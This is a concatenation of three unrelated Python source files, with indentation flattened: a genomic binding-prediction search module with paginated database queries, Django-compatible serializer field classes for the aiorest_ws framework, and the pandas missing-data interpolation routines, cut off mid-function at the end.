search_args = SearchArgs(config.binding_max_offset, args)
if search_args.is_last_page():
last_page = determine_last_page(db, genome, search_args)
search_args.set_page(last_page)
model = search_args.get_model_name()
max_sort_guess = config.get_max_sort_guess(genome, model)
search = PredictionSearch(db, genome, search_args, enable_guess=True, max_sort_guess=max_sort_guess)
predictions = search.get_predictions()
if search.has_max_prediction_guess(): # repeat without guess if we didn't get enough values
per_page = search.get_per_page()
if per_page:
if len(predictions) < per_page:
search.enable_guess = False
predictions = search.get_predictions()
return predictions, search.args, search.warning
def determine_last_page(db, genome, search_args):
search = PredictionSearch(db, genome, search_args, enable_guess=True)
items = float(search.get_count())
per_page = int(search_args.get_per_page())
return int(math.ceil(items / per_page))
def get_all_values(prediction, size):
if not size:
size = int(prediction['end']) - int(prediction['start'])
values = [0] * size
offset = 0
if 'start' in prediction:
offset = int(prediction['start'])
for data in prediction['values']:
start = int(data['start'])
value = data['value']
idx = start - offset
if 0 <= idx <= size:
if abs(value) > abs(values[idx]):
values[idx] = value
result = [str(val) for val in values]
if 'strand' in prediction:
if prediction['strand'] == '-':
return result[::-1]
return result
class PredictionQueryNames(object):
COMMON_NAME = 'common_name'
NAME = 'name'
MAX_VALUE = 'max_value'
CHROM = 'chrom'
STRAND = 'strand'
GENE_BEGIN = 'gene_begin'
PRED = 'pred'
RANGE_START = 'range_start'
RANGE_END = 'range_end'
class SearchArgs(object):
GENE_LIST = 'geneList'
MODEL = 'protein'
UPSTREAM = 'upstream'
DOWNSTREAM = 'downstream'
PAGE = 'page'
PER_PAGE = 'perPage'
MAX_PREDICTION_SORT = 'maxPredictionSort'
FORMAT = 'format'
BINDING_SITE_LIST = 'bindingSiteList'
INCLUDE_ALL = 'includeAll'
CUSTOM_LIST_DATA = 'customListData'
CUSTOM_LIST_FILTER = 'customListFilter'
CUSTOM_GENE_SEARCH_TYPE ='customGeneSearchType'
def __init__(self, max_stream_val, args):
self.max_stream_val = max_stream_val
self.args = args
self.page = args.get(self.PAGE)
def _get_required_arg(self, name):
value = self.args.get(name, None)
if not value:
raise ValueError("Missing {} field.".format(name))
return value
def _get_required_stream_arg(self, name):
value = self._get_required_arg(name)
int_value = int(value)
if int_value < 0:
raise ValueError("{} value must be positive.".format(name))
if int_value > self.max_stream_val:
raise ValueError("{} value must be less than {}.".format(name, self.max_stream_val))
if not value:
raise ValueError("Missing {} field.".format(name))
return int_value
def get_gene_list(self):
return self._get_required_arg(self.GENE_LIST)
def get_model_name(self):
return self._get_required_arg(self.MODEL)
def get_upstream(self):
return self._get_required_stream_arg(self.UPSTREAM)
def get_downstream(self):
return self._get_required_stream_arg(self.DOWNSTREAM)
def get_sort_by_max(self):
return "true" == self.args.get(self.MAX_PREDICTION_SORT)
def get_page_and_per_page(self):
page = self.page
per_page = self.get_per_page()
if page and per_page:
return int(page), int(per_page)
if page or per_page: # must have both or none
raise ValueError("You must specify both {} and {}".format(self.PAGE, self.PER_PAGE))
return None, None
def get_per_page(self):
return self.args.get(self.PER_PAGE, None)
def is_last_page(self):
return self.page and int(self.page) == -1
def set_page(self, page_num):
self.page = page_num
def get_format(self):
return self.args.get(self.FORMAT, 'json')
def get_binding_site_list(self):
"""
Does the user want to see a binding site list instead of numeric columns
:return: boolean
"""
return self.args.get(self.BINDING_SITE_LIST, '') == 'true'
def get_include_all(self):
return self.args.get(self.INCLUDE_ALL, '') == 'true'
def get_custom_list_data(self):
if self.is_custom_gene_list() or self.is_custom_ranges_list():
list_id_str = self.args.get(self.CUSTOM_LIST_DATA)
try:
val = uuid.UUID(list_id_str, version=1)
except ValueError:
raise ValueError("Invalid custom list id:{}".format(list_id_str))
custom_list_filter = self.get_custom_list_filter()
return CustomList(self.is_custom_gene_list(), list_id_str, custom_list_filter)
return ''
def get_custom_list_filter(self):
return self.args.get(self.CUSTOM_LIST_FILTER, '')
def is_custom_gene_list(self):
return self.get_gene_list() == CUSTOM_GENE_LIST
def is_custom_ranges_list(self):
return self.get_gene_list() == CUSTOM_RANGES_LIST
def get_custom_gene_search_type(self):
return self.args.get(self.CUSTOM_GENE_SEARCH_TYPE, 'gene_name')
def is_custom_gene_name_search_type(self):
return self.get_custom_gene_search_type() == CUSTOM_GENE_NAME_TYPE
def is_custom_gene_id_search_type(self):
return self.get_custom_gene_search_type() == CUSTOM_ID_TYPE
class PredictionToken(object):
def __init__(self, search_args):
self.search_args = search_args
def get(self):
result = ""
for key, value in self.search_args.args.items():
if value != 'undefined':
result += "{}={},".format(key, value)
return base64.b64encode(bytes(result, "utf-8")).decode('ascii')
class PredictionSearch(object):
def __init__(self, db, genome, search_args, enable_guess=True, max_sort_guess=None):
self.db = db
self.genome = genome
self.args = search_args
self.enable_guess = enable_guess
self.max_sort_guess = max_sort_guess
self.warning = ''
def get_count(self):
query, params = self.make_query_and_params(count=True)
cur = self.db.cursor(cursor_factory=psycopg2.extras.DictCursor)
cur.execute(query, params)
items = cur.fetchone()[0]
cur.close()
return items
def get_predictions(self):
upstream = self.args.get_upstream()
downstream = self.args.get_downstream()
query, params = self.make_query_and_params(count=False)
cur = self.db.cursor(cursor_factory=psycopg2.extras.DictCursor)
cur.execute(query, params)
predictions = []
for row in cur.fetchall():
gene_start_str = row[PredictionQueryNames.GENE_BEGIN]
gene_start = ""
if gene_start_str:
gene_start = int(gene_start_str)
strand = row[PredictionQueryNames.STRAND]
start = None
end = None
if gene_start:
if strand == '+':
start = gene_start - upstream
end = gene_start + downstream
else:
start = gene_start - downstream
end = gene_start + upstream
else:
start = row.get(PredictionQueryNames.RANGE_START, '')
end = row.get(PredictionQueryNames.RANGE_END, '')
row = {
'name': self.unique_name_parts(row.get(PredictionQueryNames.NAME, '')),
'commonName': row.get(PredictionQueryNames.COMMON_NAME, ''),
'chrom': row.get(PredictionQueryNames.CHROM, ''),
'max': str(row.get(PredictionQueryNames.MAX_VALUE, '')),
'start': str(start),
'end': str(end),
'values': self.unique_predictions(row[PredictionQueryNames.PRED]),
'strand': strand,
}
predictions.append(row)
self.db.rollback()
cur.close()
return predictions
@staticmethod
def unique_name_parts(combined_name):
# Since we left outer join we can end up with an empty prediction record.
# Skip these empty predictions so we can return an empty list.
if not combined_name:
return ''
parts = sorted(set(combined_name.split("; ")))
return "; ".join(parts)
@staticmethod
def unique_predictions(preds):
results = []
starts = set()
for pred in preds:
start = pred['start']
if start and not start in starts:
starts.add(start)
results.append(pred)
return results
@staticmethod
def same_except_name(row, prev_row):
if not prev_row:
return False
check_fields = ['commonName', 'chrom', 'max', 'start', 'end', 'strand']
for field in check_fields:
if prev_row[field] != row[field]:
return False
return True
def make_query_and_params(self, count):
return self.determine_query(count).get_query_and_params()
def determine_query(self, count):
if self.args.is_custom_gene_list():
return self.gene_list_query(count)
if self.args.is_custom_ranges_list():
return self.range_list_query(count)
if self.args.get_sort_by_max():
return self.max_query(count)
return self.normal_query(count)
def get_custom_list_fields(self):
custom_data_list = self.args.get_custom_list_data()
key = custom_data_list.key
if not does_custom_list_exist(self.db, key):
raise ValueError("No data found for this custom list. Perhaps it has purged.")
return key, custom_data_list.custom_list_filter
def gene_list_query(self, count):
custom_list_key, custom_list_filter = self.get_custom_list_fields()
limit, offset = self.get_limit_and_offset(count)
return GeneListQuery(
schema=self.genome,
custom_list_id=custom_list_key,
custom_list_filter=custom_list_filter,
custom_gene_name_type=self.args.is_custom_gene_name_search_type(),
model_name=self.args.get_model_name(),
upstream=self.args.get_upstream(),
downstream=self.args.get_downstream(),
limit=limit,
offset=offset,
count=count,
sort_by_max=self.args.get_sort_by_max(),
)
def range_list_query(self, count):
custom_list_key, custom_list_filter = self.get_custom_list_fields()
limit, offset = self.get_limit_and_offset(count)
return RangeListQuery(
schema=self.genome,
custom_list_id=custom_list_key,
model_name=self.args.get_model_name(),
limit=limit,
offset=offset,
count=count,
sort_by_max=self.args.get_sort_by_max(),
)
def max_query(self, count):
guess = None
if self.enable_guess and self.max_sort_guess:
guess = self.max_sort_guess
limit, offset = self.get_limit_and_offset(count)
return MaxPredictionQuery(
schema=self.genome,
gene_list=self.args.get_gene_list(),
model_name=self.args.get_model_name(),
upstream=self.args.get_upstream(),
downstream=self.args.get_downstream(),
guess=guess,
limit=limit,
offset=offset,
count=count,
)
def normal_query(self, count):
limit, offset = self.get_limit_and_offset(count)
return PredictionQuery(
schema=self.genome,
gene_list=self.args.get_gene_list(),
model_name=self.args.get_model_name(),
upstream=self.args.get_upstream(),
downstream=self.args.get_downstream(),
limit=limit,
offset=offset,
count=count,
)
def get_limit_and_offset(self, count):
if not count:
page, per_page = self.args.get_page_and_per_page()
if page and per_page:
return per_page, (page - 1) * per_page
return None, None
def has_max_prediction_guess(self):
return self.args.get_sort_by_max() and self.max_sort_guess
def get_per_page(self):
page, per_page = self.args.get_page_and_per_page()
return per_page
def get_name_set(self, query_and_param):
result = set()
query, params = query_and_param
cur = self.db.cursor(cursor_factory=psycopg2.extras.DictCursor)
cur.execute(query, params)
for row in cur.fetchall():
result.add(row[0])
self.db.rollback()
cur.close
return result
|
|
# -*- coding: utf-8 -*-
"""
Field entities, implemented for support Django ORM.
Every class, represented here, is associated with one certain field type of
table relatively to Django ORM. Each of them field also used later for
serializing/deserializing object of ORM.
"""
import datetime
import re
import uuid
from aiorest_ws.conf import settings
from aiorest_ws.db.orm import fields
from aiorest_ws.db.orm.django.compat import get_remote_field, \
value_from_object
from aiorest_ws.db.orm.fields import empty
from aiorest_ws.db.orm.validators import MaxLengthValidator
from aiorest_ws.utils.date.dateparse import parse_duration
from django.forms import FilePathField as DjangoFilePathField
from django.forms import ImageField as DjangoImageField
from django.core.exceptions import ValidationError as DjangoValidationError
from django.core.validators import EmailValidator, RegexValidator, \
URLValidator, ip_address_validators
from django.utils import six
from django.utils.duration import duration_string
from django.utils.encoding import is_protected_type
from django.utils.ipv6 import clean_ipv6_address
__all__ = (
'IntegerField', 'BooleanField', 'CharField', 'ChoiceField',
'MultipleChoiceField', 'FloatField', 'NullBooleanField', 'DecimalField',
'TimeField', 'DateField', 'DateTimeField', 'DurationField', 'ListField',
'DictField', 'HStoreField', 'JSONField', 'ModelField', 'ReadOnlyField',
'SerializerMethodField', 'EmailField', 'RegexField', 'SlugField',
'URLField', 'UUIDField', 'IPAddressField', 'FilePathField', 'FileField',
'ImageField', 'CreateOnlyDefault'
)
class IntegerField(fields.IntegerField):
pass
class BooleanField(fields.BooleanField):
pass
class CharField(fields.CharField):
pass
class ChoiceField(fields.ChoiceField):
pass
class MultipleChoiceField(ChoiceField):
default_error_messages = {
'invalid_choice': u'"{input}" is not a valid choice.',
'not_a_list': u'Expected a list of items but got type "{input_type}".',
'empty': u'This selection may not be empty.'
}
def __init__(self, *args, **kwargs):
self.allow_empty = kwargs.pop('allow_empty', True)
super(MultipleChoiceField, self).__init__(*args, **kwargs)
def get_value(self, dictionary):
if self.field_name not in dictionary:
if getattr(self.root, 'partial', False):
return empty
return dictionary.get(self.field_name, empty)
def to_internal_value(self, data):
if isinstance(data, type('')) or not hasattr(data, '__iter__'):
self.raise_error('not_a_list', input_type=type(data).__name__)
if not self.allow_empty and len(data) == 0:
self.raise_error('empty')
return {
super(MultipleChoiceField, self).to_internal_value(item)
for item in data
}
def to_representation(self, value):
return {
self.choice_strings_to_values.get(str(item), item)
for item in value
}
class FloatField(fields.FloatField):
pass
class NullBooleanField(fields.NullBooleanField):
pass
class DecimalField(fields.DecimalField):
pass
class TimeField(fields.TimeField):
pass
class DateField(fields.DateField):
pass
class DateTimeField(fields.DateTimeField):
pass
class DurationField(fields.AbstractField):
default_error_messages = {
'invalid': u"Duration has wrong format. Use one of these formats "
u"instead: {format}.",
}
def to_internal_value(self, value):
if isinstance(value, datetime.timedelta):
return value
parsed = parse_duration(str(value))
if parsed is not None:
return parsed
self.raise_error('invalid', format='[DD] [HH:[MM:]]ss[.uuuuuu]')
def to_representation(self, value):
return duration_string(value)
class ListField(fields.ListField):
pass
class DictField(fields.DictField):
pass
class HStoreField(fields.HStoreField):
pass
class JSONField(fields.JSONField):
pass
class ModelField(fields.ModelField):
default_error_messages = {
'max_length': u'Ensure this field has no more than {max_length} '
u'characters.'
}
def __init__(self, model_field, **kwargs):
# The `max_length` option is supported by Django's base `Field` class,
# so we'd better support it here
max_length = kwargs.pop('max_length', None)
super(ModelField, self).__init__(model_field, **kwargs)
if max_length is not None:
message = self.error_messages['max_length'].format(max_length=max_length) # NOQA
self.validators.append(MaxLengthValidator(max_length, message=message)) # NOQA
def to_internal_value(self, data):
rel = get_remote_field(self.model_field, default=None)
if rel is not None:
return rel.to._meta.get_field(rel.field_name).to_python(data)
return self.model_field.to_python(data)
def to_representation(self, obj):
value = value_from_object(self.model_field, obj)
if is_protected_type(value):
return value
return self.model_field.value_to_string(obj)
class ReadOnlyField(fields.ReadOnlyField):
pass
class SerializerMethodField(fields.SerializerMethodField):
pass
class CreateOnlyDefault(fields.CreateOnlyDefault):
pass
class EmailField(CharField):
default_error_messages = {
"invalid": u"Enter a valid email address."
}
def __init__(self, **kwargs):
super(EmailField, self).__init__(**kwargs)
validator = EmailValidator(message=self.error_messages['invalid'])
self.validators.append(validator)
class RegexField(CharField):
default_error_messages = {
'invalid': u"This value does not match the required pattern."
}
def __init__(self, regex, **kwargs):
super(RegexField, self).__init__(**kwargs)
validator = RegexValidator(
regex, message=self.error_messages['invalid']
)
self.validators.append(validator)
class SlugField(CharField):
default_error_messages = {
'invalid': u'Enter a valid "slug" consisting of letters, numbers, '
u'underscores or hyphens.'
}
def __init__(self, **kwargs):
super(SlugField, self).__init__(**kwargs)
slug_regex = re.compile(r'^[-a-zA-Z0-9_]+$')
validator = RegexValidator(
slug_regex, message=self.error_messages['invalid']
)
self.validators.append(validator)
class URLField(CharField):
default_error_messages = {
'invalid': u"Enter a valid URL."
}
def __init__(self, **kwargs):
super(URLField, self).__init__(**kwargs)
validator = URLValidator(message=self.error_messages['invalid'])
self.validators.append(validator)
class UUIDField(fields.AbstractField):
valid_formats = ('hex_verbose', 'hex', 'int', 'urn')
default_error_messages = {
'invalid': u'"{value}" is not a valid UUID.'
}
def __init__(self, **kwargs):
self.uuid_format = kwargs.pop('format', 'hex_verbose')
if self.uuid_format not in self.valid_formats:
raise ValueError(
'Invalid format for uuid representation. '
'Must be one of "{0}"'.format('", "'.join(self.valid_formats))
)
super(UUIDField, self).__init__(**kwargs)
def to_internal_value(self, data):
if not isinstance(data, uuid.UUID):
try:
if isinstance(data, int):
return uuid.UUID(int=data)
elif isinstance(data, str):
return uuid.UUID(hex=data)
else:
self.raise_error('invalid', value=data)
except ValueError:
self.raise_error('invalid', value=data)
return data
def to_representation(self, value):
if self.uuid_format == 'hex_verbose':
return str(value)
else:
return getattr(value, self.uuid_format)
class IPAddressField(CharField):
"""Support both IPAddressField and GenericIPAddressField"""
default_error_messages = {
'invalid': u"Enter a valid IPv4 or IPv6 address."
}
def __init__(self, protocol='both', **kwargs):
self.protocol = protocol.lower()
self.unpack_ipv4 = (self.protocol == 'both')
super(IPAddressField, self).__init__(**kwargs)
validators, error_message = ip_address_validators(protocol, self.unpack_ipv4) # NOQA
self.validators.extend(validators)
def to_internal_value(self, data):
if not isinstance(data, six.string_types):
self.raise_error('invalid', value=data)
if ':' in data:
try:
if self.protocol in ('both', 'ipv6'):
return clean_ipv6_address(data, self.unpack_ipv4)
except DjangoValidationError:
self.raise_error('invalid', value=data)
return super(IPAddressField, self).to_internal_value(data)
class FilePathField(ChoiceField):
default_error_messages = {
'invalid_choice': u'"{input}" is not a valid path choice.'
}
def __init__(self, path, match=None, recursive=False, allow_files=True,
allow_folders=False, required=None, **kwargs):
# Defer to Django's FilePathField implementation to get the
# valid set of choices
field = DjangoFilePathField(
path, match=match, recursive=recursive, allow_files=allow_files,
allow_folders=allow_folders, required=required
)
kwargs['choices'] = field.choices
super(FilePathField, self).__init__(**kwargs)
class FileField(fields.AbstractField):
default_error_messages = {
'required': u'No file was submitted.',
'invalid': u'The submitted data was not a file. Check the encoding '
u'type on the form.',
'no_name': u'No filename could be determined.',
'empty': u'The submitted file is empty.',
'max_length': u'Ensure this filename has at most {max_length} '
u'characters (it has {length}).',
}
def __init__(self, *args, **kwargs):
self.max_length = kwargs.pop('max_length', None)
self.allow_empty_file = kwargs.pop('allow_empty_file', False)
if 'use_url' in kwargs:
self.use_url = kwargs.pop('use_url')
super(FileField, self).__init__(*args, **kwargs)
def to_internal_value(self, data):
try:
# `UploadedFile` objects should have name and size attributes
file_name = data.name
file_size = data.size
except AttributeError:
self.raise_error('invalid')
if not file_name:
self.raise_error('no_name')
if not self.allow_empty_file and not file_size:
self.raise_error('empty')
if self.max_length and len(file_name) > self.max_length:
self.raise_error(
'max_length', max_length=self.max_length, length=len(file_name)
)
return data
def to_representation(self, value):
use_url = getattr(self, 'use_url', settings.UPLOADED_FILES_USE_URL)
if not value:
return None
if use_url:
if not getattr(value, 'url', None):
# If the file has not been saved it may not have a URL
return None
url = value.url
return url
return value.name
class ImageField(FileField):
default_error_messages = {
'invalid_image': u'Upload a valid image. The file you uploaded was '
u'either not an image or a corrupted image.'
}
def __init__(self, *args, **kwargs):
self._DjangoImageField = kwargs.pop(
'_DjangoImageField', DjangoImageField
)
super(ImageField, self).__init__(*args, **kwargs)
def to_internal_value(self, data):
# Image validation is a bit grungy, so we'll just outright
# defer to Django's implementation so we don't need to
# consider it, or treat PIL as a test dependency
file_object = super(ImageField, self).to_internal_value(data)
django_field = self._DjangoImageField()
django_field.error_messages = self.error_messages
django_field.to_python(file_object)
return file_object
|
|
"""
Routines for filling missing data.
"""
from functools import partial
from typing import TYPE_CHECKING, Any, List, Optional, Set, Union
import numpy as np
from pandas._libs import algos, lib
from pandas._typing import ArrayLike, Axis, DtypeObj
from pandas.compat._optional import import_optional_dependency
from pandas.core.dtypes.cast import infer_dtype_from
from pandas.core.dtypes.common import (
ensure_float64,
is_integer_dtype,
is_numeric_v_string_like,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import isna
if TYPE_CHECKING:
from pandas import Index
def mask_missing(arr: ArrayLike, values_to_mask) -> np.ndarray:
"""
Return a masking array of same size/shape as arr
with entries equaling any member of values_to_mask set to True
Parameters
----------
arr : ArrayLike
values_to_mask: list, tuple, or scalar
Returns
-------
np.ndarray[bool]
"""
# When called from Block.replace/replace_list, values_to_mask is a scalar
# known to be holdable by arr.
# When called from Series._single_replace, values_to_mask is tuple or list
dtype, values_to_mask = infer_dtype_from(values_to_mask)
values_to_mask = np.array(values_to_mask, dtype=dtype)
na_mask = isna(values_to_mask)
nonna = values_to_mask[~na_mask]
# GH 21977
mask = np.zeros(arr.shape, dtype=bool)
for x in nonna:
if is_numeric_v_string_like(arr, x):
# GH#29553 prevent numpy deprecation warnings
pass
else:
mask |= arr == x
if na_mask.any():
mask |= isna(arr)
return mask
def clean_fill_method(method, allow_nearest: bool = False):
# asfreq is compat for resampling
if method in [None, "asfreq"]:
return None
if isinstance(method, str):
method = method.lower()
if method == "ffill":
method = "pad"
elif method == "bfill":
method = "backfill"
valid_methods = ["pad", "backfill"]
expecting = "pad (ffill) or backfill (bfill)"
if allow_nearest:
valid_methods.append("nearest")
expecting = "pad (ffill), backfill (bfill) or nearest"
if method not in valid_methods:
raise ValueError(f"Invalid fill method. Expecting {expecting}. Got {method}")
return method
# interpolation methods that dispatch to np.interp
NP_METHODS = ["linear", "time", "index", "values"]
# interpolation methods that dispatch to _interpolate_scipy_wrapper
SP_METHODS = [
"nearest",
"zero",
"slinear",
"quadratic",
"cubic",
"barycentric",
"krogh",
"spline",
"polynomial",
"from_derivatives",
"piecewise_polynomial",
"pchip",
"akima",
"cubicspline",
]
def clean_interp_method(method: str, **kwargs) -> str:
order = kwargs.get("order")
if method in ("spline", "polynomial") and order is None:
raise ValueError("You must specify the order of the spline or polynomial.")
valid = NP_METHODS + SP_METHODS
if method not in valid:
raise ValueError(f"method must be one of {valid}. Got '{method}' instead.")
return method
def find_valid_index(values, how: str):
"""
Retrieves the index of the first valid value.
Parameters
----------
values : ndarray or ExtensionArray
how : {'first', 'last'}
Use this parameter to change between the first or last valid index.
Returns
-------
int or None
"""
assert how in ["first", "last"]
if len(values) == 0: # early stop
return None
is_valid = ~isna(values)
if values.ndim == 2:
is_valid = is_valid.any(1) # reduce axis 1
if how == "first":
idxpos = is_valid[::].argmax()
if how == "last":
idxpos = len(values) - 1 - is_valid[::-1].argmax()
chk_notna = is_valid[idxpos]
if not chk_notna:
return None
return idxpos
def interpolate_1d(
xvalues: "Index",
yvalues: np.ndarray,
method: Optional[str] = "linear",
limit: Optional[int] = None,
limit_direction: str = "forward",
limit_area: Optional[str] = None,
fill_value: Optional[Any] = None,
bounds_error: bool = False,
order: Optional[int] = None,
**kwargs,
):
"""
Logic for the 1-d interpolation. The result should be 1-d, inputs
xvalues and yvalues will each be 1-d arrays of the same length.
Bounds_error is currently hardcoded to False since non-scipy ones don't
take it as an argument.
"""
invalid = isna(yvalues)
valid = ~invalid
if not valid.any():
result = np.empty(xvalues.shape, dtype=np.float64)
result.fill(np.nan)
return result
if valid.all():
return yvalues
if method == "time":
if not needs_i8_conversion(xvalues.dtype):
raise ValueError(
"time-weighted interpolation only works "
"on Series or DataFrames with a "
"DatetimeIndex"
)
method = "values"
valid_limit_directions = ["forward", "backward", "both"]
limit_direction = limit_direction.lower()
if limit_direction not in valid_limit_directions:
raise ValueError(
"Invalid limit_direction: expecting one of "
f"{valid_limit_directions}, got '{limit_direction}'."
)
if limit_area is not None:
valid_limit_areas = ["inside", "outside"]
limit_area = limit_area.lower()
if limit_area not in valid_limit_areas:
raise ValueError(
f"Invalid limit_area: expecting one of {valid_limit_areas}, got "
f"{limit_area}."
)
# default limit is unlimited GH #16282
limit = algos.validate_limit(nobs=None, limit=limit)
# These are sets of index pointers to invalid values... i.e. {0, 1, etc...
all_nans = set(np.flatnonzero(invalid))
start_nans = set(range(find_valid_index(yvalues, "first")))
end_nans = set(range(1 + find_valid_index(yvalues, "last"), len(valid)))
mid_nans = all_nans - start_nans - end_nans
# Like the sets above, preserve_nans contains indices of invalid values,
# but in this case, it is the final set of indices that need to be
# preserved as NaN after the interpolation.
# For example if limit_direction='forward' then preserve_nans will
# contain indices of NaNs at the beginning of the series, and NaNs that
# are more than'limit' away from the prior non-NaN.
# set preserve_nans based on direction using _interp_limit
preserve_nans: Union[List, Set]
if limit_direction == "forward":
preserve_nans = start_nans | set(_interp_limit(invalid, limit, 0))
elif limit_direction == "backward":
preserve_nans = end_nans | set(_interp_limit(invalid, 0, limit))
else:
# both directions... just use _interp_limit
preserve_nans = set(_interp_limit(invalid, limit, limit))
# if limit_area is set, add either mid or outside indices
# to preserve_nans GH #16284
if limit_area == "inside":
# preserve NaNs on the outside
preserve_nans |= start_nans | end_nans
elif limit_area == "outside":
# preserve NaNs on the inside
preserve_nans |= mid_nans
# sort preserve_nans and covert to list
preserve_nans = sorted(preserve_nans)
result = yvalues.copy()
# xarr to pass to NumPy/SciPy
xarr = xvalues._values
if needs_i8_conversion(xarr.dtype):
# GH#1646 for dt64tz
xarr = xarr.view("i8")
if method == "linear":
inds = xarr
else:
inds = np.asarray(xarr)
if method in ("values", "index"):
if inds.dtype == np.object_:
inds = lib.maybe_convert_objects(inds)
if method in NP_METHODS:
# np.interp requires sorted X values, #21037
indexer = np.argsort(inds[valid])
result[invalid] = np.interp(
inds[invalid], inds[valid][indexer], yvalues[valid][indexer]
)
else:
result[invalid] = _interpolate_scipy_wrapper(
inds[valid],
yvalues[valid],
inds[invalid],
method=method,
fill_value=fill_value,
bounds_error=bounds_error,
order=order,
**kwargs,
)
result[preserve_nans] = np.nan
return result
def _interpolate_scipy_wrapper(
x, y, new_x, method, fill_value=None, bounds_error=False, order=None, **kwargs
):
"""
Passed off to scipy.interpolate.interp1d. method is scipy's kind.
Returns an array interpolated at new_x. Add any new methods to
the list in _clean_interp_method.
"""
extra = f"{method} interpolation requires SciPy."
import_optional_dependency("scipy", extra=extra)
from scipy import interpolate
new_x = np.asarray(new_x)
# ignores some kwargs that could be passed along.
alt_methods = {
"barycentric": interpolate.barycentric_interpolate,
"krogh": interpolate.krogh_interpolate,
"from_derivatives": _from_derivatives,
"piecewise_polynomial": _from_derivatives,
}
if getattr(x, "_is_all_dates", False):
# GH 5975, scipy.interp1d can't handle datetime64s
x, new_x = x._values.astype("i8"), new_x.astype("i8")
if method == "pchip":
alt_methods["pchip"] = interpolate.pchip_interpolate
elif method == "akima":
alt_methods["akima"] = _akima_interpolate
elif method == "cubicspline":
alt_methods["cubicspline"] = _cubicspline_interpolate
interp1d_methods = [
"nearest",
"zero",
"slinear",
"quadratic",
"cubic",
"polynomial",
]
if method in interp1d_methods:
if method == "polynomial":
method = order
terp = interpolate.interp1d(
x, y, kind=method, fill_value=fill_value, bounds_error=bounds_error
)
new_y = terp(new_x)
elif method == "spline":
# GH #10633, #24014
if isna(order) or (order <= 0):
raise ValueError(
f"order needs to be specified and greater than 0; got order: {order}"
)
terp = interpolate.UnivariateSpline(x, y, k=order, **kwargs)
new_y = terp(new_x)
else:
# GH 7295: need to be able to write for some reason
# in some circumstances: check all three
if not x.flags.writeable:
x = x.copy()
if not y.flags.writeable:
y = y.copy()
if not new_x.flags.writeable:
new_x = new_x.copy()
method = alt_methods[method]
new_y = method(x, y, new_x, **kwargs)
return new_y
def _from_derivatives(xi, yi, x, order=None, der=0, extrapolate=False):
"""
Convenience function for interpolate.BPoly.from_derivatives.
Construct a piecewise polynomial in the Bernstein basis, compatible
with the specified values and derivatives at breakpoints.
Parameters
----------
xi : array_like
sorted 1D array of x-coordinates
yi : array_like or list of array-likes
yi[i][j] is the j-th derivative known at xi[i]
order: None or int or array_like of ints. Default: None.
Specifies the degree of local polynomials. If not None, some
derivatives are ignored.
der : int or list
How many derivatives to extract; None for all potentially nonzero
derivatives (that is a number equal to the number of points), or a
list of derivatives to extract. This number includes the function
value as 0th derivative.
extrapolate : bool, optional
Whether to extrapolate to ouf-of-bounds points based on first and last
intervals, or to return NaNs. Default: True.
See Also
--------
scipy.interpolate.BPoly.from_derivatives
Returns
-------
y : scalar or array_like
The result, of length R or length M or M by R.
"""
from scipy import interpolate
# return the method for compat with scipy version & backwards compat
method = interpolate.BPoly.from_derivatives
m = method(xi, yi.reshape(-1, 1), orders=order, extrapolate=extrapolate)
return m(x)
def _akima_interpolate(xi, yi, x, der=0, axis=0):
"""
Convenience function for akima interpolation.
xi and yi are arrays of values used to approximate some function f,
with ``yi = f(xi)``.
See `Akima1DInterpolator` for details.
Parameters
----------
xi : array_like
A sorted list of x-coordinates, of length N.
yi : array_like
A 1-D array of real values. `yi`'s length along the interpolation
axis must be equal to the length of `xi`. If N-D array, use axis
parameter to select correct axis.
x : scalar or array_like
Of length M.
der : int, optional
How many derivatives to extract; None for all potentially
nonzero derivatives (that is a number equal to the number
of points), or a list of derivatives to extract. This number
includes the function value as 0th derivative.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
See Also
--------
scipy.interpolate.Akima1DInterpolator
Returns
-------
y : scalar or array_like
The result, of length R or length M or M by R,
"""
from scipy import interpolate
P = interpolate.Akima1DInterpolator(xi, yi, axis=axis)
return P(x, nu=der)
def _cubicspline_interpolate(xi, yi, x, axis=0, bc_type="not-a-knot", extrapolate=None):
"""
Convenience function for cubic spline data interpolator.
See `scipy.interpolate.CubicSpline` for details.
Parameters
----------
xi : array_like, shape (n,)
1-d array containing values of the independent variable.
Values must be real, finite and in strictly increasing order.
yi : array_like
Array containing values of the dependent variable. It can have
arbitrary number of dimensions, but the length along ``axis``
(see below) must match the length of ``x``. Values must be finite.
x : scalar or array_like, shape (m,)
axis : int, optional
Axis along which `y` is assumed to be varying. Meaning that for
``x[i]`` the corresponding values are ``np.take(y, i, axis=axis)``.
Default is 0.
bc_type : string or 2-tuple, optional
Boundary condition type. Two additional equations, given by the
boundary conditions, are required to determine all coefficients of
polynomials on each segment [2]_.
If `bc_type` is a string, then the specified condition will be applied
at both ends of a spline. Available conditions are:
* 'not-a-knot' (default): The first and second segment at a curve end
are the same polynomial. It is a good default when there is no
information on boundary conditions.
* 'periodic': The interpolated functions is assumed to be periodic
of period ``x[-1] - x[0]``. The first and last value of `y` must be
identical: ``y[0] == y[-1]``. This boundary condition will result in
``y'[0] == y'[-1]`` and ``y''[0] == y''[-1]``.
* 'clamped': The first derivative at curves ends are zero. Assuming
a 1D `y`, ``bc_type=((1, 0.0), (1, 0.0))`` is the same condition.
* 'natural': The second derivative at curve ends are zero. Assuming
a 1D `y`, ``bc_type=((2, 0.0), (2, 0.0))`` is the same condition.
If `bc_type` is a 2-tuple, the first and the second value will be
applied at the curve start and end respectively. The tuple values can
be one of the previously mentioned strings (except 'periodic') or a
tuple `(order, deriv_values)` allowing to specify arbitrary
derivatives at curve ends:
* `order`: the derivative order, 1 or 2.
* `deriv_value`: array_like containing derivative values, shape must
be the same as `y`, excluding ``axis`` dimension. For example, if
`y` is 1D, then `deriv_value` must be a scalar. If `y` is 3D with
the shape (n0, n1, n2) and axis=2, then `deriv_value` must be 2D
and have the shape (n0, n1).
extrapolate : {bool, 'periodic', None}, optional
If bool, determines whether to extrapolate to out-of-bounds points
based on first and last intervals, or to return NaNs. If 'periodic',
periodic extrapolation is used. If None (default), ``extrapolate`` is
set to 'periodic' for ``bc_type='periodic'`` and to True otherwise.
See Also
--------
scipy.interpolate.CubicHermiteSpline
Returns
-------
y : scalar or array_like
The result, of shape (m,)
References
----------
.. [1] `Cubic Spline Interpolation
<https://en.wikiversity.org/wiki/Cubic_Spline_Interpolation>`_
on Wikiversity.
.. [2] Carl de Boor, "A Practical Guide to Splines", Springer-Verlag, 1978.
"""
from scipy import interpolate
P = interpolate.CubicSpline(
